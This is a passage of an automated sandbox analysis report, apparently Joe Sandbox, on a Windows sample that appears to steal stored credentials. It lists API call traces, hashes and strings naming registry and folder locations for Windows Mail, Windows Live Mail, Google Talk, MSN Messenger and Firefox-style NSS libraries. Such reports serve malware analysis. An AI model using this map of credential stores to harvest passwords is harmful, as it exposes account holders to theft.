                  • Instruction ID: c2e845550ef1ad64eb6aea8f75856b2ed0c0391cefdfa0dcc66b3553e8bd0076
                  • Opcode Fuzzy Hash: 0cd59659463b3ba6b54fd34f3b5747a647caaa08127f994ca48f4bf1f9d9109b
                  • Instruction Fuzzy Hash: 46419070D04249EFCB209FA4D9496ED7BB4EB09315F2081BBE861D7291D7B859D2CB1C

                  APIs
                  • memset.MSVCRT ref: 004113E5
                    • Part of subcall function 0040F4CA: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 0040F501
                    • Part of subcall function 00406763: strlen.MSVCRT ref: 00406765
                    • Part of subcall function 00406763: strlen.MSVCRT ref: 00406770
                    • Part of subcall function 00406763: strcat.MSVCRT(00000000,0041140D,0000001C,0041140D,\Microsoft\Windows Mail,?,?,?), ref: 00406787
                    • Part of subcall function 0040F4CA: memset.MSVCRT ref: 0040F51F
                    • Part of subcall function 0040F4CA: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                    • Part of subcall function 0040F4CA: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                  • memset.MSVCRT ref: 00411453
                  • memset.MSVCRT ref: 0041146E
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004114A7
                  • strlen.MSVCRT ref: 004114B5
                  • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 004114DB
                  Strings
                  • \Microsoft\Windows Mail, xrefs: 00411403
                  • Store Root, xrefs: 0041147F
                  • \Microsoft\Windows Live Mail, xrefs: 0041142A
                  • Software\Microsoft\Windows Live Mail, xrefs: 00411484
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_stricmpstrcatstrcpy
                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                  • API String ID: 4292528749-2578778931
                  • Opcode ID: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                  • Instruction ID: e9664ad0f3b84b924b74ee59ba002f7e9f43dcf230935329a4dad2143823624c
                  • Opcode Fuzzy Hash: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                  • Instruction Fuzzy Hash: 45317772504348ABD320EBA9DD46FCB7BDC9B88714F00442FF649D7182EA78D55487AA

                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: ??2@$DeleteIconLoadObjectmemsetstrcpy
                  • String ID: xDA
                  • API String ID: 3205015851-812456957
                  • Opcode ID: ad96368dabae8c74e1e24747d7fbaeb21c173cde6fa866393d14417aa5932aab
                  • Instruction ID: 1611dc68708d9a603d76385fea93fddb5fcd3a07b13b65f331774950c43fbb3a
                  • Opcode Fuzzy Hash: ad96368dabae8c74e1e24747d7fbaeb21c173cde6fa866393d14417aa5932aab
                  • Instruction Fuzzy Hash: 9C2192F19002509BCB50EF758E897C97BA8AB44705F1444BBEE0CEF296D7B845818BAD

                  APIs
                  • memset.MSVCRT ref: 004037AC
                  • memset.MSVCRT ref: 004037C0
                    • Part of subcall function 00411622: memset.MSVCRT ref: 00411644
                    • Part of subcall function 00411622: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  • strchr.MSVCRT ref: 0040382F
                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040384C
                  • strlen.MSVCRT ref: 00403858
                  • sprintf.MSVCRT ref: 00403878
                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040388E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                  • String ID: %s@yahoo.com
                  • API String ID: 1649821605-3288273942
                  • Opcode ID: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                  • Instruction ID: fac56a1422f5c84d721e9c9d17906f33e473bda0e694fa5a8ecc328811f6b8f6
                  • Opcode Fuzzy Hash: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                  • Instruction Fuzzy Hash: 952186B3D0012C6EDB21EA54DD41BDA77AC9F45348F0401EBF649F6181E6B8AF848F69

                  APIs
                  • GetClientRect.USER32(?,?), ref: 0040A7D1
                  • GetWindowRect.USER32(?,?), ref: 0040A7E7
                  • GetWindowRect.USER32(?,?), ref: 0040A7FA
                  • BeginDeferWindowPos.USER32(00000003), ref: 0040A817
                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A834
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A854
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A87B
                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0040A884
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: Window$Defer$Rect$BeginCallbackClientDispatcherUser
                  • String ID:
                  • API String ID: 466569379-0
                  • Opcode ID: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                  • Instruction ID: 09cbeee5e8014f0efd252c30326660bc7ddd54a992e069e65e32613af5811a3b
                  • Opcode Fuzzy Hash: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                  • Instruction Fuzzy Hash: AF21C871A00209FFDB11DFA8DD89FEEBBB9FB08311F104465FA55A2160CA71AA519B24

                  APIs
                  • memset.MSVCRT ref: 0040B86E
                  • memset.MSVCRT ref: 0040B882
                  • RegisterClassA.USER32(?), ref: 0040B8C5
                    • Part of subcall function 004019DA: strncat.MSVCRT ref: 004019FA
                  • CreateWindowExA.USER32(00000000,00000000,00000000,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,?), ref: 0040B908
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: memset$ClassCreateRegisterWindowstrncat
                  • String ID: P4A$xDA
                  • API String ID: 3664037073-2763913229
                  • Opcode ID: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                  • Instruction ID: a433a9f07fbe34a5cd63bc5fe357f5218a2175739f92369553503b68093de8d1
                  • Opcode Fuzzy Hash: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                  • Instruction Fuzzy Hash: F1211FB5C01218AFDB50DF95DD85ADFBBBCEB08354F0040BAE549B3251C778AE848BA4

                  APIs
                  • memset.MSVCRT ref: 004034C5
                  • memset.MSVCRT ref: 004034DB
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • strcpy.MSVCRT(00000000,00000000), ref: 00403516
                    • Part of subcall function 00405F29: strlen.MSVCRT ref: 00405F2A
                    • Part of subcall function 00405F29: strcat.MSVCRT(00000000,00414078,004062C9,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 00405F41
                  • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 0040352E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: memsetstrcat$Closestrcpystrlen
                  • String ID: InstallPath$Software\Group Mail$fb.dat
                  • API String ID: 1387626053-966475738
                  • Opcode ID: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                  • Instruction ID: 36ed55b5d374e154850240320204e9d1b3c473ccad1168af83c786b56a3c059d
                  • Opcode Fuzzy Hash: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                  • Instruction Fuzzy Hash: 8201D8B294012879D720E655DD46FCA7A6C5F34745F0000E6BA48F21C2DAFCABD58B69
                  APIs
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 00407418
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 0040742C
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 00407446
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 0040745B
                    • Part of subcall function 004073B6: GetComputerNameA.KERNEL32(?,?), ref: 0040747D
                    • Part of subcall function 004073B6: GetUserNameA.ADVAPI32(?,?), ref: 00407491
                    • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
                    • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
                    • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074CE
                    • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074DD
                    • Part of subcall function 004073B6: memcpy.MSVCRT ref: 004074EF
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00407705
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • memset.MSVCRT ref: 00407756
                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00407794
                  • RegCloseKey.ADVAPI32(?), ref: 004077BB
                  Strings
                  • Software\Google\Google Talk\Accounts, xrefs: 004076D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: memset$ByteCharCloseMulusermeWidestrlen$ComputerEnumOpenUsermemcpy
                  • String ID: Software\Google\Google Talk\Accounts
                  • API String ID: 2959138223-1079885057
                  • Opcode ID: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                  • Instruction ID: a99152f29cb3baba476c483fa4670b136c65b11177ef5495e630776d68c42b47
                  • Opcode Fuzzy Hash: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                  • Instruction Fuzzy Hash: 93219471408209BED610DE51DD42EABBBECEF84344F00043AB944D1192E635DD5D9BA7
                  APIs
                    • Part of subcall function 0040F41D: LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76F90A60,?,00000000), ref: 0040F42B
                    • Part of subcall function 0040F41D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 0040F501
                  • memset.MSVCRT ref: 0040F51F
                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                  • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                    • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F53A, 0040F54A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetstrcpy
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 1359237156-2036018995
                  • Opcode ID: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                  • Instruction ID: 8c400c1df07908664f594f880775229253182a5e7b911f92c7f22337ad7f8634
                  • Opcode Fuzzy Hash: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                  • Instruction Fuzzy Hash: 34119971801114BADB30AA989C899DF77AC9715308F5400BBFD51B2593D6385F9C8A99
                  APIs
                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A64F
                    • Part of subcall function 00405E36: LoadCursorA.USER32(00000000,00007F02), ref: 00405E3D
                    • Part of subcall function 00405E36: SetCursor.USER32(00000000,?,0040BCA6), ref: 00405E44
                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A672
                    • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5C7
                    • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5F1
                    • Part of subcall function 0040A5A1: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                    • Part of subcall function 0040A5A1: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                  • SetCursor.USER32(?,?,0040B7F8), ref: 0040A697
                  • SetFocus.USER32(?,?,?,0040B7F8), ref: 0040A6A9
                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A6C0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                  • String ID:
                  • API String ID: 2210206837-0
                  • Opcode ID: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                  • Instruction ID: 509cc9229267159212bead5259dcc336d8983f4e7fdf05ffa4c6fe4d4677fdd3
                  • Opcode Fuzzy Hash: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                  • Instruction Fuzzy Hash: C601E9B1244604EFD326AB75CD89FA6B7E9FF48305F0544B9F15D9B271CA716E018B10
                  APIs
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040399F
                    • Part of subcall function 0040DC39: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                    • Part of subcall function 0040DC39: strlen.MSVCRT ref: 0040DD15
                    • Part of subcall function 0040DC39: strcpy.MSVCRT(?,?), ref: 0040DD26
                    • Part of subcall function 0040DC39: LocalFree.KERNEL32(?), ref: 0040DD33
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039D1
                  Strings
                  • Software\Microsoft\MSNMessenger, xrefs: 00403999
                  • Software\Microsoft\MessengerService, xrefs: 004039CB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                  • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                  • API String ID: 1910562259-1741179510
                  • Opcode ID: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                  • Instruction ID: a8690c8f59c2d6ddd84299c782105f2e65a9bc437c951c5f77a69b85a32d1474
                  • Opcode Fuzzy Hash: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                  • Instruction Fuzzy Hash: 1111D8B1108309AED320EE5198818ABBFEC9B95355F50843FF544A2081D3789A4DCAAB
                  APIs
                  • memset.MSVCRT ref: 0040F10B
                    • Part of subcall function 00406792: sprintf.MSVCRT ref: 004067CA
                    • Part of subcall function 00406792: memcpy.MSVCRT ref: 004067DD
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040F12F
                  • memset.MSVCRT ref: 0040F146
                  • GetPrivateProfileStringA.KERNEL32(?,?,0041344F,?,00002000,?), ref: 0040F164
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                  • String ID:
                  • API String ID: 3143880245-0
                  • Opcode ID: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                  • Instruction ID: bc019f7bd72990c6dd937b38e23e5507a0673011dafb680486f8cad4f2b6b185
                  • Opcode Fuzzy Hash: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                  • Instruction Fuzzy Hash: DF01657240421DAFEF16AF50DD89EDB7B79EF04344F104076B609A1052D6359A64DB68
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  • Opcode ID: 5da1b589d0a8832eef683b15a6d122c0a6d1a7040e709ba4429a645e3444abce
                  • Instruction ID: c43431202d49818a45d5cc7318ffcbdb911bff3577ce92db202b1535657ef0fb
                  • Opcode Fuzzy Hash: 5da1b589d0a8832eef683b15a6d122c0a6d1a7040e709ba4429a645e3444abce
                  • Instruction Fuzzy Hash: C2F0FFB1542210AEDB94DB34EE467953AE6E708354F10813EE60ACA2B1FFB85440CB0C
                  APIs
                  • malloc.MSVCRT ref: 00406120
                  • memcpy.MSVCRT ref: 00406138
                  • free.MSVCRT(00000000,00000000,76F90A60,00406B78,00000001,?,00000000,76F90A60,00406EF2,00000000,?,?), ref: 00406141
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: freemallocmemcpy
                  • String ID:
                  • API String ID: 3056473165-0
                  • Opcode ID: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                  • Instruction ID: 359978e28c917f6ac826eaac10a3cae38cc8b637956f46d5a6e637dfc07492fc
                  • Opcode Fuzzy Hash: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                  • Instruction Fuzzy Hash: DFF089726052229FC708AF76A98145BB79DAF48354712487FF505E7282DB38DCA0C7A4
                  APIs
                    • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                    • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                  • CreateFontIndirectA.GDI32(?), ref: 0040627A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFontIndirectmemsetstrcpy
                  • String ID: Arial
                  • API String ID: 3275230829-493054409
                  • Opcode ID: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                  • Instruction ID: 6f23277ce9f10cc220d5cb12b38cfb89722835dabc034d80cc056b5664af2580
                  • Opcode Fuzzy Hash: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                  • Instruction Fuzzy Hash: 8FD01270D4020D77E610FBA0FC07FC97BAC5B00B05F504431B901F50E6FAE8E2598699
                  APIs
                  • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                  • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: dd3c990b6f06f7b2c2dc03ff0729752becd90f53d511295c87def889df5af8d9
                  • Instruction ID: e11a758ee00da1144c6059c362540eea0e8ddd3b96c7f8f8d0d1d8718a4c60ba
                  • Opcode Fuzzy Hash: dd3c990b6f06f7b2c2dc03ff0729752becd90f53d511295c87def889df5af8d9
                  • Instruction Fuzzy Hash: E2E08C727803107AF2208A845C82FB6A29C9BA5B96F14443BB310AA0D086FC6D1597A9
                  APIs
                  • strlen.MSVCRT ref: 0040494C
                  • SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404970
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSendstrlen
                  • String ID:
                  • API String ID: 2816241398-0
                  • Opcode ID: cb208c766c1001eb7ba4300ff83e866a755fc887a556a9000c54e44cd27ded0d
                  • Instruction ID: 9d3c5f83707486ce63b794c921ddeab77c6af5fa5737131b185e384af3409ada
                  • Opcode Fuzzy Hash: cb208c766c1001eb7ba4300ff83e866a755fc887a556a9000c54e44cd27ded0d
                  • Instruction Fuzzy Hash: 51F0FEB1D0420EAFDF04DF95D9457EEBBB8BB08315F108429E914B2281D7788641CFA4
                  APIs
                    • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                  • LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
